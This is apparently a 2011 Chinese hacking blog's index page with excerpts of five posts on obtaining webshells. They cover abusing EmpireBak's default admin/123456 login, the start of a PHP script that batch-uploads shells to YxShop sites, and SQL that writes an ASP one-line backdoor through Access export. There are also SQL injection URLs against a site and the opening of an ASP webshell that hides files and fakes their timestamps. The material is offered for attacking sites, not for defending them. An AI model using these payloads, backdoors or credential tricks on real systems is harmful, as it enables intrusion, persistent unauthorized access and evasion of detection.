帝国备份王(Empirebak)拿webshell

   
分类:安全 | 2011-08-28 | 撸过 1,852 次
0人扯蛋

帝国备份王(Empirebak)简介
EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库.

可在 http://www.phome.net/ebak2008os/ 下载到

默认账号密码为
admin 123456

登陆后先备份一次数据

备份时可选择备份到的目录。。默认有个safemod

当然也可以是别的..这里以safemod来说了

备份完毕后来到

管理备份目录

打包并下载

把开始备份到的数据可以先下回分析..当然数据库比较大的话可以省略这一步..因为我之前下载已经分析完毕了

备份后的saf[......]

继续阅读

YxShop 上传漏洞批量shell

   
分类:安全 | 2011-08-27 | 撸过 1,290 次
0人扯蛋

这个是根据一篇文章来的思路
文章名字 好像叫做批量Getshell 一例吧
借用了里面在百度获取URL的代码!!自己写了上传shell的代码!
php学的不是很好,大牛们看了就别踩了!!
这个主要是给大家批shell时拿来修改的!
这个是测试图

贴出来代码:

<?php
print_r('
[*]  Getshell for Exploits
[-]  by : [email]cfking@90sec.org[/email]
[-]  -----------------------------------
[-]  Get URL ......
                ');[......]

继续阅读

access导出webshell

   
分类:安全 | 2011-08-23 | 撸过 1,026 次
0人扯蛋

create table cmd(shell text)
insert into cmd (shell) values('<%execute request(1)%>')
SELECT shell into [fuck] in 'D:\web\me\backdoorx\asp.asp;x.xls' 'EXCEL 4.0;'from cmd

 [......]

继续阅读

网趣网上购物系统时尚版 V最新漏洞拿WEBSHELL

   
分类:安全 | 2011-08-3 | 撸过 2,297 次
0人扯蛋
西宁威势
今天周末,睡到中午才起床,刚上线,看到QQ好友辐射鱼给我留言,找我测试脚本漏洞。

辐射鱼 13:01:03
等我找个点.
辐射鱼 13:03:48
https://www.webshell.cc/price.asp?anid=62%20and%20exists%20(select%20*%20from%20cnhww)
辐射鱼 13:04:41
 表cnhww.为啥不支持 order by
辐射鱼 13:05:06
https://www.webshell.cc/price.asp?anid=62%20order%20by%201
辐射鱼 13:05:29
password/admin[......]

继续阅读

隐藏并修改文件的最后修改时间的asp-webshell

   
分类:安全 | 2011-08-2 | 撸过 920 次
0人扯蛋

作者:skyfire[B.H.S.T]

隐藏并修改文件的最后修改时间的asp-webshell

源码:

<%
'隐藏并修改文件的最后修改时间的aspshell
'原理:通过FSO可以修改文件的属性,比如设置为只读,隐藏,系统等等;FSO中的attributes属性修改文件属性,1只读,2隐藏,4系统文件
'     通过shell.application可以给文件重新设置一个最后修改时间
'2009/02/24  write by skyfire
response.write "<form method=post>"
response.write "路&nb[......]

继续阅读